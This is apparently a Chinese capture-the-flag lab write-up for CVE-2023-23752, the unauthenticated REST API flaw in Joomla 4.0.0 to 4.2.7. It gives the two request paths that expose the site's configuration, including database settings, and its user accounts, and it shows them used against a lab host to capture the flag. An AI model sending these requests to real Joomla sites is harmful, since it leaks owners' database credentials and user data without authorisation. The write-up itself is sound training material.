[春秋云镜] CVE-2023-23752 writeup

首先奉上大佬的wp表示尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客

知识点

  • Joomla版本为4.0.0 到 4.2.7 存在未授权访问漏洞

    • Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行
  • 未授权api路径

    • 获取网站的配置文件信息
      • /api/index.php/v1/config/application?public=true
    • 获取账号密码信息
      • api/index.php/v1/users?public=true
    • 其他api接口
      • 详见开头大佬的wp结尾
  • REST API

解题思路

题目地址:Home

点击连接进入到网页初始页面

可以看到旁边有很多的链接:登录界面,找回密码界面,找回用户名界面

通过测试发现这些界面无法进入,到这里已废,只能求助大佬的wp

发现了未授权的接口链接:

复制代码
获取网站的配置文件信息:
/api/index.php/v1/config/application?public=true

将该路径添加到网站后面发现成功得到了配置文件的信息:数据库的相关配置信息

复制代码
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true
复制代码
获取网站的账号密码信息:
api/index.php/v1/users?public=true

通过构造访问得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}

复制代码
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true

10

相关推荐
云手机掌柜7 小时前
亚矩阵云手机:亚马逊第三方店铺多账号安全合规运营的核心技术支撑
安全·智能手机·矩阵·手机
往日情怀酿做酒 V17639296388 小时前
信息收集5----(信息收集综合利用工具)
安全
曼岛_11 小时前
[系统架构设计师]安全架构设计理论与实践(十八)
安全·系统架构·安全架构·系统架构设计师
艾小码14 小时前
前端安全防护手册:对抗XSS、CSRF、点击劫持等攻击
前端·安全·xss
网硕互联的小客服16 小时前
如何配置安全的SFTP服务器?
运维·服务器·安全
飞凌嵌入式17 小时前
高性能、高实时、高安全:如何在飞凌嵌入式i.MX95xx核心板上同时实现?
嵌入式硬件·安全·嵌入式·飞凌嵌入式
智驱力人工智能17 小时前
安全帽检测算法如何提升工地安全管理效率
人工智能·算法·安全·边缘计算·安全帽检测·口罩检测·安全鞋检测
派拉软件19 小时前
微软AD国产化替换倒计时——不是选择题,而是生存题
网络·安全·microsoft·目录管理·微软ad替换·身份与访问控制管理iam
卓码软件测评20 小时前
软件测试:如何利用Burp Suite进行高效WEB安全测试
网络·安全·web安全·可用性测试·安全性测试